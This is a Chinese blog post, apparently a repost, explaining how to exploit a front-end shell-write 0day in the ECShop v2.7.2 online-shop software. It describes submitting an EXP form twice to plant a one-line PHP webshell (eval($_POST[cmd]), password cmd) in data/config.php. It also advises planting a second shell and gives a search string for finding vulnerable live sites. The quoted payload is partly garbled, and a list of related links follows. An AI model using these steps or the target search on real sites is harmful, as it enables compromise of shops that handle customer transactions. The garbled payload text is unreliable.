ECSHOP号称最大的开源网店系统,官方是这样介绍它的:“ECShop网店系统是一套免费开源的网上商店软件,无论在稳定性、代码优化、运行效率、负载能力、安全等级、功能可操控性和权限严密性等方面都居国内外同类产品领先地位。

按照我的理解,作为一款网店系统,系统的安全性应该摆在很重要的位置,但ECSHOP却好像漏洞不断。就在前几天,xhming大牛又公布了一个ECSHOP前台写shell的Oday,利用漏洞获得shell非常简单,可以说是秒杀。从官方下载的ECSHOP的最新版本也存在这个漏洞,官方还没有出相应的补丁或对软件进行升级修补这个漏洞。

ECSHOP出现新漏洞对我来说是件好事,因为又有拿shell的漏洞了,哈哈。也希望ECSHOP在漏洞挖掘者的鞭策下能把ECSHOP做的更安全,更优秀,毕竟网店系统涉及网络交易,不是闹着玩的。

一、漏洞简介

出现漏洞的文件是demo目录下的index.php,代码我就不贴出来了!

关于漏洞的详细介绍请看漏洞出处。

二、漏洞利用方法

具体的漏洞分析我也不会,直接来看怎么利用这个漏洞来获得shell。目前ECSHOP的最新版本为,我危险漫步从官方下载了GBK版本的ECShop_V2.7.2pGBK Release0604,在虚拟机的PHPP环境中把ECSHOP安装了起来。

在论坛的一篇文章中xhming给出了一个漏洞利用的EXP,是一个用于提交数据的html文件,两次提交后会自动打开demo/index.php,页面上会显示phpinfo,xhming说了,提

交内容可以随意,言下之意就是你可以自己构造提交内容直接获得shell而不是象征性的执行phpinfo()函数。但并不是每个人都会构造直接获得shell的提交内容,好在Mr.LP在xhming的EXP的基础上修改后给出了可以直接获得shell的EXP。

使用方法:

1.修改form中action的内容为需要网址。

2.提交表单一次。

3.连接一句话木马,密码为cmd。把上面代码保存为exp.html,直接打开发现有乱码。把“charset=utf-8”修改为“charset=gbk”后乱码问题解决了。

用记事本打开exp.html,把提交地址修改为我虚拟机中ECSHOP的提交地址,保存修改后打开exp.html,点“提交”按钮后显示的结果,会把php-句话木马写到data目录下的config.php文件中,用lanker-句话PHP后门客户端连接,密码cmd,发现php-句话木马不能用。

在页面按网页浏览器的后退按钮来到exp.html,点“提交”按钮再提交一次数据。提交完数据后再次用lanker-句话PHP后门客户端连接,这次获得了shell)。

原来要提交两次才能获得shell,这里要注意一下。

通过比较原来的data目录下的config.php和获得shell后的config.php,发现通过两次提交数据向config.php中写入了下面的数据:define('EC_LANGUAGEI',.);@eVal($一POST[cmd]);#');@eval($_POST[cmdl);#’);。建议用获得的shell上传另一个shell上去。然后去掉config.php中新写入的数据。

通过搜索“Powered by ECShop v2,7.2”等可能找到存在这个漏洞的网站。ecshop的前台写shell 0day危险漫步就给大家介绍到这里,自己有ECSHOP网站的朋友等官方出了这个漏洞的补丁后快打上吧,漏洞很严重。这个漏洞利用起来非常简单,只需要写上目标网站的地址点两次“提交”按钮就获得了shell,对存在这个漏洞的网站可以说是秒杀。希望在利用这个漏洞拿shell时不要对网站造成破坏,如果能知道出现这个漏洞的原因并且学习漏洞利用的方法和思路就更好了。

转载于:https://www.cnblogs.com/hack-moumou/p/7435177.html

秒杀ecshop的前台写shell 0day相关推荐

  1. 【网络安全】代码审计-zzcms2021前台写shell?

    本次是对zzcms2021前台一个可能的写配置文件的点进行分析(已交cnvd,不知道收不收呀),为什么说是可能,各位师傅往下看就好啦 [学习资料] 从官网下载最新源码后,本地搭建环境进行分析 主要利用 ...

  2. SQL语句利用日志写shell

    outfile被禁止,或者写入文件被拦截: 在数据库中操作如下:(必须是root权限) show variables like '%general%'; #查看配置 set global genera ...

  3. Linux-编写Shell的几个技巧_02

    文章目录 Pre 避免重叠运行 意外退出时杀掉所有子进程 timeout 限制运行时间 连续管道时, 使用 tee 将中间结果落盘,以便查问题 set -x -e -u -o pipefail Pre ...

  4. linux mysql general_利用mysql general log 写shell 可行性简要分析

    0×01 前言 实际渗透过程中,我们很可能会遇到这样的情况,明明是正儿八经的mysql root权限,但实际利用into outfile写shell的时候,却怎么都写不进去,前提可以肯定的是,我们对目 ...

  5. php shell,php命令行写shell实例详解

    php 可以像java perl python 那样运行,今天发现如果我早早知道这个,或许我不会去学习java 和 python 当年学java不过为了一个程序放在服务器上,不停的跑啊跑,原来 php ...

  6. 涨姿势:抛弃字母、数字和下划线写SHELL

    PHP中异或 (^) 的概念 <?php echo"A"^"?"; ?> <?php echo"A"^"?&qu ...

  7. Linux-编写SHELL 加密解密方法

    Linux-编写SHELL 加密解密方法 我们在编写SHELL脚本时,有时候需要填写密码到脚本里,比如mysql备份脚本,这时我们就需要一个脚本加密解密的方法了,我使用GO语音执行Linux命令加密解 ...

  8. Mysql 后台日志写shell(root权限)

    Mysql 写shell 一.后台日志写shell 前提: 需要有root权限 outfile被禁止 文件写入被拦截 1.查看配置 是否开启写日志 日志写入路径 show variables like ...

  9. 使用vscode写shell脚本

    使用vscode写shell脚本 1.下载vscode https://az764295.vo.msecnd.net/stable/f80445acd5a3dadef24aa209168452a3d9 ...

最新文章

  1. 2017年3月23下午学习日志
  2. HDU-1978 How many ways 动态规划
  3. qq飞车服务器维护中是什么,《QQ飞车》服务器对赛车平跑稳定性的影响攻略
  4. 机器学习笔记:过拟合和欠拟合
  5. 【好文链接】什么是最小二乘法?
  6. 多线程的那点儿事(之顺序锁)
  7. android foobar wifi,foobar2000安卓
  8. 2020-10-22标准正态分布表(scipy.stats)
  9. 【炫斗之王win7主题下载】
  10. 第五次打卡 模型融合
  11. 3大领域,4大方向,做好数据分析岗位的职业规划
  12. 微信查券机器人、微信公众号自动查询淘宝优惠券机器人制作教程
  13. 【PAT】PAT那些破事
  14. 绕过安卓SSL验证证书的常见四种方式
  15. 进口吲哚菁绿活化脂,ICG-NHS ester,Indocyanine Green - Activated Lipid
  16. xcode引入sdk_解决Xcode引入第三方SDK找不到头文件
  17. cout和cerr的区别
  18. 网络编程的5种IO模型
  19. 详细讲解go web框架之gin框架源码解析记录及思路流程和理解
  20. java dwr_【Java】dwr的使用方法

热门文章

  1. 大数据ssm项目案例总结
  2. 云函数实现wps每日云空间签到
  3. SAP MM 物料主数据:公司代码 XXXX 不存在或没有完全维护
  4. 关于出版《AR Foundation增强现实开发实战(ARKit版)》(2022-09-11创建)
  5. spring源码分析系列(一)
  6. Spring学习:Spring的IOC注解
  7. centos7部署prometheus+exporter+grafana+Alertmanager+企业微信
  8. 怎么用计算机改变声音的音调,男声变女声用什么软件?能电脑语音说话变声吗?...
  9. 百度地图----地理编码与反地理编码
  10. 使用O2OA二次开发搭建企业办公平台(二)平台部署篇:端口冲突和服务器端口配置